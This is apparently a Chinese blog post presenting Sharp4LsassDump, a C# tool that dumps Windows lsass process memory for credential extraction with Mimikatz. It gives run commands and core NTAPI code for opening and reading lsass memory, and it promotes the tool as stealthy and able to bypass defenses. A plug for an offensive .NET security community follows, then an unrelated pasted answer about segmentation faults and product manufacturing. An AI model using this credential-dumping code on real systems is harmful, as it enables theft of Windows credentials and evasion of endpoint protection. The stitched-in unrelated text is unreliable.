.NET 一款通过核心进程转储凭据的工具

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4LsassDump是一款专为Windows系统设计的lsass进程转储工具,使用NTAPI而非常见的dbghelp!MinidumpWriteDump函数,生成一个转储文件。这个文件仅包含解析工具如Mimikatz所需的流,包括SystemInfo、ModuleList和Memory64List等流。

03使用方法

Sharp4LsassDump的使用非常简单,支持两种运行方式:默认情况下,Sharp4LsassDump会在当前目录下生成转储文件。另外,可以传入一个参数[DUMP_FILE]来指定转储文件的保存路径。具体用法如下所示。

Sharp4LsassDump.exe
Sharp4LsassDump.exe C:\dump\lsass.dmp

04原理解析

Sharp4LsassDump的核心在于通过NTAPI进行进程内存的读取与操作。部分核心代码如下:

IntPtr processHandle = IntPtr.Zero;
CLIENT_ID client_id = new CLIENT_ID();
client_id.UniqueProcess = (IntPtr)processPID;
client_id.UniqueThread = IntPtr.Zero;
OBJECT_ATTRIBUTES objAttr = new OBJECT_ATTRIBUTES();
uint ntstatus = NtOpenProcess(ref processHandle, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, ref objAttr, ref client_id);

首先,通过NtOpenProcess函数打开目标进程句柄,指定的权限为PROCESS_QUERY_INFORMATION和PROCESS_VM_READ,允许我们查询进程信息及读取其虚拟内存。接着,通过CustomGetModuleHandle函数获取lsasrv.dll模块的加载地址:

IntPtr lsasrvdll_address = CustomGetModuleHandle(processHandle, "lsasrv.dll");
int lsasrvdll_size = 0;
bool bool_test = false;

接下来是查询虚拟内存信息并读取lsass进程的指定内存区域,通过NtQueryVirtualMemory获取指定内存地址的内存信息,然后使用NtReadVirtualMemory函数读取该区域的内存数据并存储到buffer数组中。

MEMORY_BASIC_INFORMATION mbi = new MEMORY_BASIC_INFORMATION();
ntstatus = NtQueryVirtualMemory(processHandle, (IntPtr)mem_address, MemoryBasicInformation, out mbi, 0x30, out _);
byte[] buffer = new byte[(int)mbi.RegionSize];
ntstatus = NtReadVirtualMemory(processHandle, mbi.BaseAddress, buffer, (int)mbi.RegionSize, out _);

随后,将读取的数据与现有的memory_regions数组拼接在一起,形成最终的转储数据

byte[] new_bytearray = new byte[memory_regions.Length + buffer.Length];
Buffer.BlockCopy(memory_regions, 0, new_bytearray, 0, memory_regions.Length);
Buffer.BlockCopy(buffer, 0, new_bytearray, memory_regions.Length, buffer.Length);
memory_regions = new_bytearray;

通过这种方式,Sharp4LsassDump能够仅将必要的内存区域存储到转储文件中,而不会转储整个lsass进程的内存。

综上,Sharp4LsassDump是一款功能强大且隐蔽性高的lsass进程转储工具,适用于各种渗透测试场景。它通过NTAPI的直接调用来实现转储操作,避免了使用传统的MinidumpWriteDump函数,从而能够绕过多种防护措施。这款工具在Windows 10和11上的测试表现非常稳定,对于安全研究人员和渗透测试人员来说,具有较高的实用价值。

05.NET安全星球

目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

星球文化20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输

图片

在计算机编程中,"段错误 (核心转储)"通常不是一个用来描述产品生产的术语,而是表示程序运行时的一种错误类型。它通常发生在程序试图访问内存中不应访问的部分,比如尝试读取或写入已被释放的内存、数组越界,或者是其他与内存管理相关的错误。这并不直接适用于产品生产的上下文。 然而,如果你想了解如何生产一个产品,无论是软件还是实体产品,一般会包括以下步骤: 1. **市场研究**: 确定目标市场、用户需求和竞争对手分析,为产品定位做好准备。 2. **设计阶段**: 制定产品规格、外观设计和功能规划。 3. **原型制作**: 制作产品的初步模型,测试并收集反馈。 4. **生产计划**: 设计生产流程,选择合适的材料和供应商。 5. **质量控制**: 建立严格的品质管理体系,确保产品符合标准。 6. **生产**: 根据计划批量生产,可能涉及自动化生产线或手工制造。 7. **测试与调试**: 在大规模生产前做全面的测试,解决任何可能的问题。 8. **包装与物流**: 准备产品的最终包装,并安排运输和分销。 9. **营销与推广**: 制定广告策略,通过各种渠道向消费者推广产品。 10. **售后服务**: 提供客户支持,处理售后问题和维护良好口碑。 如果你有关于产品生产的具体问题,如某个阶段的操作细节或技术难点,可以详细提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值